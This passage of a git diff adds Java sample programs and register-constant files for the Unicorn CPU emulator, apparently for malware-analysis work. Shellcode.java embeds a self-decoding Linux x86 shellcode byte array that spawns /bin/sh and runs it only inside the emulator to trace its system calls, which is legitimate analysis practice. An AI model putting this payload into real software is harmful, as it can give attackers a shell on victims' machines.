memory + u.mem_write(ADDRESS, X86_CODE32_LOOP); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // emulate machine code in 2 seconds, so we can quit even + // if the code loops + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.length, 2 * Unicorn.UC_SECOND_SCALE, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + // emulate code that read invalid memory + static void test_i386_invalid_mem_read() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that read from invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_MEM_READ); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); + } catch (UnicornException uex) { + int err = u.errno(); + System.out.printf("Failed on u.emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + // emulate code that read invalid memory + static void test_i386_invalid_mem_write() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that write to invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // intercept invalid memory events + u.hook_add(new MyWriteInvalidHook(), Unicorn.UC_HOOK_MEM_WRITE_UNMAPPED, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + // read from memory + byte tmp[] = u.mem_read(0xaaaaaaaa, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, toInt(tmp)); + + try { + u.mem_read(0xffffffaa, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xffffffaa, toInt(tmp)); + } catch (UnicornException uex) { + System.out.printf(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); + } + + u.close(); + } + + // emulate code that jump to invalid memory + static void test_i386_jump_invalid() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that jumps to invalid memory\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_JMP_INVALID); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + u.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_JMP_INVALID.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error returned: %s\n", uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + u.close(); + } + + static void test_x86_64() + { + long rax = 0x71f3029efd49d41dL; + long rbx = 0xd87b45277f133ddbL; + long rcx = 0xab40d1ffd8afc461L; + long rdx = 0x919317b4a733f01L; + long rsi = 0x4c24e753a17ea358L; + long rdi = 0xe509a57d2571ce96L; + long r8 = 0xea5b108cc2b9ab1fL; + long r9 = 0x19ec097c8eb618c1L; + long r10 = 0xec45774f00c5f682L; + long r11 = 0xe17e9dbec8c074aaL; + long r12 = 0x80f86a8dc0f6d457L; + long r13 = 0x48288ca5671c5492L; + long r14 = 0x595f72f6e4017f6eL; + long r15 = 0x1efd97aea331ccccL; + + long rsp = ADDRESS + 0x200000; + + System.out.print("Emulate x86_64 code\n"); + + // Initialize emulator in X86-64bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE64); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_RSP, new Long(rsp)); + + u.reg_write(Unicorn.UC_X86_REG_RAX, new Long(rax)); + u.reg_write(Unicorn.UC_X86_REG_RBX, new Long(rbx)); + u.reg_write(Unicorn.UC_X86_REG_RCX, new Long(rcx)); + u.reg_write(Unicorn.UC_X86_REG_RDX, new Long(rdx)); + u.reg_write(Unicorn.UC_X86_REG_RSI, new Long(rsi)); + u.reg_write(Unicorn.UC_X86_REG_RDI, new Long(rdi)); + u.reg_write(Unicorn.UC_X86_REG_R8, new Long(r8)); + u.reg_write(Unicorn.UC_X86_REG_R9, new Long(r9)); + u.reg_write(Unicorn.UC_X86_REG_R10, new Long(r10)); + u.reg_write(Unicorn.UC_X86_REG_R11, new Long(r11)); + u.reg_write(Unicorn.UC_X86_REG_R12, new Long(r12)); + u.reg_write(Unicorn.UC_X86_REG_R13, new Long(r13)); + u.reg_write(Unicorn.UC_X86_REG_R14, new Long(r14)); + u.reg_write(Unicorn.UC_X86_REG_R15, new Long(r15)); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions in the range [ADDRESS, ADDRESS+20] + u.hook_add(new MyCode64Hook(), ADDRESS, ADDRESS+20, null); + + // tracing all memory WRITE access (with @begin > @end) + u.hook_add(new MyWrite64Hook(), 1, 0, null); + + // tracing all memory READ access (with @begin > @end) + u.hook_add(new MyRead64Hook(), 1, 0, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + X86_CODE64.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + Long r_rax = (Long)u.reg_read(Unicorn.UC_X86_REG_RAX); + Long r_rbx = (Long)u.reg_read(Unicorn.UC_X86_REG_RBX); + Long r_rcx = (Long)u.reg_read(Unicorn.UC_X86_REG_RCX); + Long r_rdx = (Long)u.reg_read(Unicorn.UC_X86_REG_RDX); + Long r_rsi = (Long)u.reg_read(Unicorn.UC_X86_REG_RSI); + Long r_rdi = (Long)u.reg_read(Unicorn.UC_X86_REG_RDI); + Long r_r8 = (Long)u.reg_read(Unicorn.UC_X86_REG_R8); + Long r_r9 = (Long)u.reg_read(Unicorn.UC_X86_REG_R9); + Long r_r10 = (Long)u.reg_read(Unicorn.UC_X86_REG_R10); + Long r_r11 = (Long)u.reg_read(Unicorn.UC_X86_REG_R11); + Long r_r12 = (Long)u.reg_read(Unicorn.UC_X86_REG_R12); + Long r_r13 = (Long)u.reg_read(Unicorn.UC_X86_REG_R13); + Long r_r14 = (Long)u.reg_read(Unicorn.UC_X86_REG_R14); + Long r_r15 = (Long)u.reg_read(Unicorn.UC_X86_REG_R15); + + System.out.printf(">>> RAX = 0x%x\n", r_rax.longValue()); + System.out.printf(">>> RBX = 0x%x\n", r_rbx.longValue()); + System.out.printf(">>> RCX = 0x%x\n", r_rcx.longValue()); + System.out.printf(">>> RDX = 0x%x\n", r_rdx.longValue()); + System.out.printf(">>> RSI = 0x%x\n", r_rsi.longValue()); + System.out.printf(">>> RDI = 0x%x\n", r_rdi.longValue()); + System.out.printf(">>> R8 = 0x%x\n", r_r8.longValue()); + System.out.printf(">>> R9 = 0x%x\n", r_r9.longValue()); + System.out.printf(">>> R10 = 0x%x\n", r_r10.longValue()); + System.out.printf(">>> R11 = 0x%x\n", r_r11.longValue()); + System.out.printf(">>> R12 = 0x%x\n", r_r12.longValue()); + System.out.printf(">>> R13 = 0x%x\n", r_r13.longValue()); + System.out.printf(">>> R14 = 0x%x\n", r_r14.longValue()); + System.out.printf(">>> R15 = 0x%x\n", r_r15.longValue()); + + u.close(); + } + + static void test_x86_16() + { + Long eax = new Long(7); + Long ebx = new Long(5); + Long esi = new Long(6); + + System.out.print("Emulate x86 16-bit code\n"); + + // Initialize emulator in X86-16bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_16); + + // map 8KB memory for this emulation + u.mem_map(0, 8 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(0, X86_CODE16); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_EAX, eax); + u.reg_write(Unicorn.UC_X86_REG_EBX, ebx); + u.reg_write(Unicorn.UC_X86_REG_ESI, esi); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(0, X86_CODE16.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + // read from memory + byte[] tmp = u.mem_read(11, 1); + System.out.printf(">>> Read 1 bytes from [0x%x] = 0x%x\n", 11, toInt(tmp)); + + u.close(); + } + + public static void main(String args[]) + { + if (args.length == 1) { + if (args[0].equals("-32")) { + test_i386(); + test_i386_inout(); + test_i386_jump(); + test_i386_loop(); + test_i386_invalid_mem_read(); + test_i386_invalid_mem_write(); + test_i386_jump_invalid(); + } + + if (args[0].equals("-64")) { + test_x86_64(); + } + + if (args[0].equals("-16")) { + test_x86_16(); + } + + // test memleak + if (args[0].equals("-0")) { + while(true) { + test_i386(); + // test_x86_64(); + } + } + } else { + System.out.print("Syntax: java Sample_x86 <-16|-32|-64>\n"); + } + + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java new file mode 100644 index 0000000..e2b1a6d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86_mmr.java @@ -0,0 +1,77 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Sample code to demonstrate how to register read/write API */ + +import unicorn.*; + +public class Sample_x86_mmr { + + static void test_x86_mmr() { + // Initialize emulator in X86-32bit mode + Unicorn uc; + try { + uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + } catch (UnicornException uex) { + System.out.println("Failed on uc_open() with error returned: " + uex); + return; + } + + // map 4k + uc.mem_map(0x400000, 0x1000, Unicorn.UC_PROT_ALL); + + X86_MMR ldtr1 = new X86_MMR(0x1111111122222222L, 0x33333333, 0x44444444, (short)0x5555); + X86_MMR ldtr2; + X86_MMR gdtr1 = new X86_MMR(0x6666666677777777L, 0x88888888, 0x99999999, (short)0xaaaa); + X86_MMR gdtr2, gdtr3, gdtr4; + + int eax; + + // initialize machine registers + + uc.reg_write(Unicorn.UC_X86_REG_LDTR, ldtr1); + uc.reg_write(Unicorn.UC_X86_REG_GDTR, gdtr1); + uc.reg_write(Unicorn.UC_X86_REG_EAX, new Long(0xdddddddd)); + + // read the registers back out + eax = (int)((Long)uc.reg_read(Unicorn.UC_X86_REG_EAX)).longValue(); + ldtr2 = (X86_MMR)uc.reg_read(Unicorn.UC_X86_REG_LDTR); + gdtr2 = (X86_MMR)uc.reg_read(Unicorn.UC_X86_REG_GDTR); + + System.out.printf(">>> EAX = 0x%x\n", eax); + + System.out.printf(">>> LDTR.base = 0x%x\n", ldtr2.base); + System.out.printf(">>> LDTR.limit = 0x%x\n", ldtr2.limit); + System.out.printf(">>> LDTR.flags = 0x%x\n", ldtr2.flags); + System.out.printf(">>> LDTR.selector = 0x%x\n\n", ldtr2.selector); + + System.out.printf(">>> GDTR.base = 0x%x\n", gdtr2.base); + System.out.printf(">>> GDTR.limit = 0x%x\n", gdtr2.limit); + + uc.close(); + } + + public static void main(String args[]) + { + test_x86_mmr(); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java new file mode 100644 index 0000000..48674a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Shellcode.java @@ -0,0 +1,161 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ + +/* Sample code to trace code with Linux code with syscall */ + +import unicorn.*; +import java.math.*; + +public class Shellcode { + + public static final byte[] X86_CODE32 = {-21,25,49,-64,49,-37,49,-46,49,-55,-80,4,-77,1,89,-78,5,-51,-128,49,-64,-80,1,49,-37,-51,-128,-24,-30,-1,-1,-1,104,101,108,108,111}; + public static final byte[] X86_CODE32_SELF = {-21,28,90,-119,-42,-117,2,102,61,-54,125,117,6,102,5,3,3,-119,2,-2,-62,61,65,65,65,65,117,-23,-1,-26,-24,-33,-1,-1,-1,49,-46,106,11,88,-103,82,104,47,47,115,104,104,47,98,105,110,-119,-29,82,83,-119,-31,-54,125,65,65,65,65,65,65,65,65}; + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + public static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user) { + + System.out.print(String.format("Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + System.out.print(String.format("*** EIP = %x ***: ", r_eip.intValue())); + + size = Math.min(16, size); + + byte[] tmp = u.mem_read(address, size); + for (int i = 0; i < tmp.length; i++) { + System.out.print(String.format("%x ", 0xff & tmp[i])); + } + System.out.print("\n"); + } + }; + + public static class MyInterruptHook implements InterruptHook { + public void hook(Unicorn u, int intno, Object user) { + Long r_ecx; + Long r_edx; + int size; + + // only handle Linux syscall + if (intno != 0x80) { + return; + } + + Long r_eax = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + + switch (r_eax.intValue()) { + default: + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip.intValue(), intno, r_eax.intValue())); + break; + case 1: // sys_exit + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, SYS_EXIT. quit!\n\n", r_eip.intValue(), intno)); + u.emu_stop(); + break; + case 4: // sys_write + // ECX = buffer address + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + + // EDX = buffer size + r_edx = (Long)u.reg_read(Unicorn.UC_X86_REG_EDX); + + // read the buffer in + size = (int)Math.min(256, r_edx); + + byte[] buffer = u.mem_read(r_ecx, size); + System.out.print(String.format(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = '%s'\n", + r_eip.intValue(), intno, r_ecx.intValue(), r_edx.intValue(), new String(buffer))); + break; + } + } + } + + static void test_i386() + { + Long r_esp = new Long(ADDRESS + 0x200000); // ESP register + + System.out.print("Emulate i386 code\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_SELF); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_ESP, r_esp); + + // tracing all instructions by having @begin > @end + u.hook_add(new MyCodeHook(), 1, 0, null); + + // handle interrupt ourself + u.hook_add(new MyInterruptHook(), null); + + System.out.print("\n>>> Start tracing this Linux code\n"); + + // emulate machine code in infinite time + // u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 12); <--- emulate only 12 instructions + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 0); + + System.out.print("\n>>> Emulation done.\n"); + + u.close(); + } + + public static void main(String args[]) + { + if (args.length == 1) { + if ("-32".equals(args[0])) { + test_i386(); + } + } else { + System.out.print("Syntax: java Shellcode <-32|-64>\n"); + } + + } + +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java new file mode 100644 index 0000000..dc70de8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Arm64Const.java @@ -0,0 +1,317 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface Arm64Const { + +// ARM64 registers + + public static final int UC_ARM64_REG_INVALID = 0; + public static final int UC_ARM64_REG_X29 = 1; + public static final int UC_ARM64_REG_X30 = 2; + public static final int UC_ARM64_REG_NZCV = 3; + public static final int UC_ARM64_REG_SP = 4; + public static final int UC_ARM64_REG_WSP = 5; + public static final int UC_ARM64_REG_WZR = 6; + public static final int UC_ARM64_REG_XZR = 7; + public static final int UC_ARM64_REG_B0 = 8; + public static final int UC_ARM64_REG_B1 = 9; + public static final int UC_ARM64_REG_B2 = 10; + public static final int UC_ARM64_REG_B3 = 11; + public static final int UC_ARM64_REG_B4 = 12; + public static final int UC_ARM64_REG_B5 = 13; + public static final int UC_ARM64_REG_B6 = 14; + public static final int UC_ARM64_REG_B7 = 15; + public static final int UC_ARM64_REG_B8 = 16; + public static final int UC_ARM64_REG_B9 = 17; + public static final int UC_ARM64_REG_B10 = 18; + public static final int UC_ARM64_REG_B11 = 19; + public static final int UC_ARM64_REG_B12 = 20; + public static final int UC_ARM64_REG_B13 = 21; + public static final int UC_ARM64_REG_B14 = 22; + public static final int UC_ARM64_REG_B15 = 23; + public static final int UC_ARM64_REG_B16 = 24; + public static final int UC_ARM64_REG_B17 = 25; + public static final int UC_ARM64_REG_B18 = 26; + public static final int UC_ARM64_REG_B19 = 27; + public static final int UC_ARM64_REG_B20 = 28; + public static final int UC_ARM64_REG_B21 = 29; + public static final int UC_ARM64_REG_B22 = 30; + public static final int UC_ARM64_REG_B23 = 31; + public static final int UC_ARM64_REG_B24 = 32; + public static final int UC_ARM64_REG_B25 = 33; + public static final int UC_ARM64_REG_B26 = 34; + public static final int UC_ARM64_REG_B27 = 35; + public static final int UC_ARM64_REG_B28 = 36; + public static final int UC_ARM64_REG_B29 = 37; + public static final int UC_ARM64_REG_B30 = 38; + public static final int UC_ARM64_REG_B31 = 39; + public static final int UC_ARM64_REG_D0 = 40; + public static final int UC_ARM64_REG_D1 = 41; + public static final int UC_ARM64_REG_D2 = 42; + public static final int UC_ARM64_REG_D3 = 43; + public static final int UC_ARM64_REG_D4 = 44; + public static final int UC_ARM64_REG_D5 = 45; + public static final int UC_ARM64_REG_D6 = 46; + public static final int UC_ARM64_REG_D7 = 47; + public static final int UC_ARM64_REG_D8 = 48; + public static final int UC_ARM64_REG_D9 = 49; + public static final int UC_ARM64_REG_D10 = 50; + public static final int UC_ARM64_REG_D11 = 51; + public static final int UC_ARM64_REG_D12 = 52; + public static final int UC_ARM64_REG_D13 = 53; + public static final int UC_ARM64_REG_D14 = 54; + public static final int UC_ARM64_REG_D15 = 55; + public static final int UC_ARM64_REG_D16 = 56; + public static final int UC_ARM64_REG_D17 = 57; + public static final int UC_ARM64_REG_D18 = 58; + public static final int UC_ARM64_REG_D19 = 59; + public static final int UC_ARM64_REG_D20 = 60; + public static final int UC_ARM64_REG_D21 = 61; + public static final int UC_ARM64_REG_D22 = 62; + public static final int UC_ARM64_REG_D23 = 63; + public static final int UC_ARM64_REG_D24 = 64; + public static final int UC_ARM64_REG_D25 = 65; + public static final int UC_ARM64_REG_D26 = 66; + public static final int UC_ARM64_REG_D27 = 67; + public static final int UC_ARM64_REG_D28 = 68; + public static final int UC_ARM64_REG_D29 = 69; + public static final int UC_ARM64_REG_D30 = 70; + public static final int UC_ARM64_REG_D31 = 71; + public static final int UC_ARM64_REG_H0 = 72; + public static final int UC_ARM64_REG_H1 = 73; + public static final int UC_ARM64_REG_H2 = 74; + public static final int UC_ARM64_REG_H3 = 75; + public static final int UC_ARM64_REG_H4 = 76; + public static final int UC_ARM64_REG_H5 = 77; + public static final int UC_ARM64_REG_H6 = 78; + public static final int UC_ARM64_REG_H7 = 79; + public static final int UC_ARM64_REG_H8 = 80; + public static final int UC_ARM64_REG_H9 = 81; + public static final int UC_ARM64_REG_H10 = 82; + public static final int UC_ARM64_REG_H11 = 83; + public static final int UC_ARM64_REG_H12 = 84; + public static final int UC_ARM64_REG_H13 = 85; + public static final int UC_ARM64_REG_H14 = 86; + public static final int UC_ARM64_REG_H15 = 87; + public static final int UC_ARM64_REG_H16 = 88; + public static final int UC_ARM64_REG_H17 = 89; + public static final int UC_ARM64_REG_H18 = 90; + public static final int UC_ARM64_REG_H19 = 91; + public static final int UC_ARM64_REG_H20 = 92; + public static final int UC_ARM64_REG_H21 = 93; + public static final int UC_ARM64_REG_H22 = 94; + public static final int UC_ARM64_REG_H23 = 95; + public static final int UC_ARM64_REG_H24 = 96; + public static final int UC_ARM64_REG_H25 = 97; + public static final int UC_ARM64_REG_H26 = 98; + public static final int UC_ARM64_REG_H27 = 99; + public static final int UC_ARM64_REG_H28 = 100; + public static final int UC_ARM64_REG_H29 = 101; + public static final int UC_ARM64_REG_H30 = 102; + public static final int UC_ARM64_REG_H31 = 103; + public static final int UC_ARM64_REG_Q0 = 104; + public static final int UC_ARM64_REG_Q1 = 105; + public static final int UC_ARM64_REG_Q2 = 106; + public static final int UC_ARM64_REG_Q3 = 107; + public static final int UC_ARM64_REG_Q4 = 108; + public static final int UC_ARM64_REG_Q5 = 109; + public static final int UC_ARM64_REG_Q6 = 110; + public static final int UC_ARM64_REG_Q7 = 111; + public static final int UC_ARM64_REG_Q8 = 112; + public static final int UC_ARM64_REG_Q9 = 113; + public static final int UC_ARM64_REG_Q10 = 114; + public static final int UC_ARM64_REG_Q11 = 115; + public static final int UC_ARM64_REG_Q12 = 116; + public static final int UC_ARM64_REG_Q13 = 117; + public static final int UC_ARM64_REG_Q14 = 118; + public static final int UC_ARM64_REG_Q15 = 119; + public static final int UC_ARM64_REG_Q16 = 120; + public static final int UC_ARM64_REG_Q17 = 121; + public static final int UC_ARM64_REG_Q18 = 122; + public static final int UC_ARM64_REG_Q19 = 123; + public static final int UC_ARM64_REG_Q20 = 124; + public static final int UC_ARM64_REG_Q21 = 125; + public static final int UC_ARM64_REG_Q22 = 126; + public static final int UC_ARM64_REG_Q23 = 127; + public static final int UC_ARM64_REG_Q24 = 128; + public static final int UC_ARM64_REG_Q25 = 129; + public static final int UC_ARM64_REG_Q26 = 130; + public static final int UC_ARM64_REG_Q27 = 131; + public static final int UC_ARM64_REG_Q28 = 132; + public static final int UC_ARM64_REG_Q29 = 133; + public static final int UC_ARM64_REG_Q30 = 134; + public static final int UC_ARM64_REG_Q31 = 135; + public static final int UC_ARM64_REG_S0 = 136; + public static final int UC_ARM64_REG_S1 = 137; + public static final int UC_ARM64_REG_S2 = 138; + public static final int UC_ARM64_REG_S3 = 139; + public static final int UC_ARM64_REG_S4 = 140; + public static final int UC_ARM64_REG_S5 = 141; + public static final int UC_ARM64_REG_S6 = 142; + public static final int UC_ARM64_REG_S7 = 143; + public static final int UC_ARM64_REG_S8 = 144; + public static final int UC_ARM64_REG_S9 = 145; + public static final int UC_ARM64_REG_S10 = 146; + public static final int UC_ARM64_REG_S11 = 147; + public static final int UC_ARM64_REG_S12 = 148; + public static final int UC_ARM64_REG_S13 = 149; + public static final int UC_ARM64_REG_S14 = 150; + public static final int UC_ARM64_REG_S15 = 151; + public static final int UC_ARM64_REG_S16 = 152; + public static final int UC_ARM64_REG_S17 = 153; + public static final int UC_ARM64_REG_S18 = 154; + public static final int UC_ARM64_REG_S19 = 155; + public static final int UC_ARM64_REG_S20 = 156; + public static final int UC_ARM64_REG_S21 = 157; + public static final int UC_ARM64_REG_S22 = 158; + public static final int UC_ARM64_REG_S23 = 159; + public static final int UC_ARM64_REG_S24 = 160; + public static final int UC_ARM64_REG_S25 = 161; + public static final int UC_ARM64_REG_S26 = 162; + public static final int UC_ARM64_REG_S27 = 163; + public static final int UC_ARM64_REG_S28 = 164; + public static final int UC_ARM64_REG_S29 = 165; + public static final int UC_ARM64_REG_S30 = 166; + public static final int UC_ARM64_REG_S31 = 167; + public static final int UC_ARM64_REG_W0 = 168; + public static final int UC_ARM64_REG_W1 = 169; + public static final int UC_ARM64_REG_W2 = 170; + public static final int UC_ARM64_REG_W3 = 171; + public static final int UC_ARM64_REG_W4 = 172; + public static final int UC_ARM64_REG_W5 = 173; + public static final int UC_ARM64_REG_W6 = 174; + public static final int UC_ARM64_REG_W7 = 175; + public static final int UC_ARM64_REG_W8 = 176; + public static final int UC_ARM64_REG_W9 = 177; + public static final int UC_ARM64_REG_W10 = 178; + public static final int UC_ARM64_REG_W11 = 179; + public static final int UC_ARM64_REG_W12 = 180; + public static final int UC_ARM64_REG_W13 = 181; + public static final int UC_ARM64_REG_W14 = 182; + public static final int UC_ARM64_REG_W15 = 183; + public static final int UC_ARM64_REG_W16 = 184; + public static final int UC_ARM64_REG_W17 = 185; + public static final int UC_ARM64_REG_W18 = 186; + public static final int UC_ARM64_REG_W19 = 187; + public static final int UC_ARM64_REG_W20 = 188; + public static final int UC_ARM64_REG_W21 = 189; + public static final int UC_ARM64_REG_W22 = 190; + public static final int UC_ARM64_REG_W23 = 191; + public static final int UC_ARM64_REG_W24 = 192; + public static final int UC_ARM64_REG_W25 = 193; + public static final int UC_ARM64_REG_W26 = 194; + public static final int UC_ARM64_REG_W27 = 195; + public static final int UC_ARM64_REG_W28 = 196; + public static final int UC_ARM64_REG_W29 = 197; + public static final int UC_ARM64_REG_W30 = 198; + public static final int UC_ARM64_REG_X0 = 199; + public static final int UC_ARM64_REG_X1 = 200; + public static final int UC_ARM64_REG_X2 = 201; + public static final int UC_ARM64_REG_X3 = 202; + public static final int 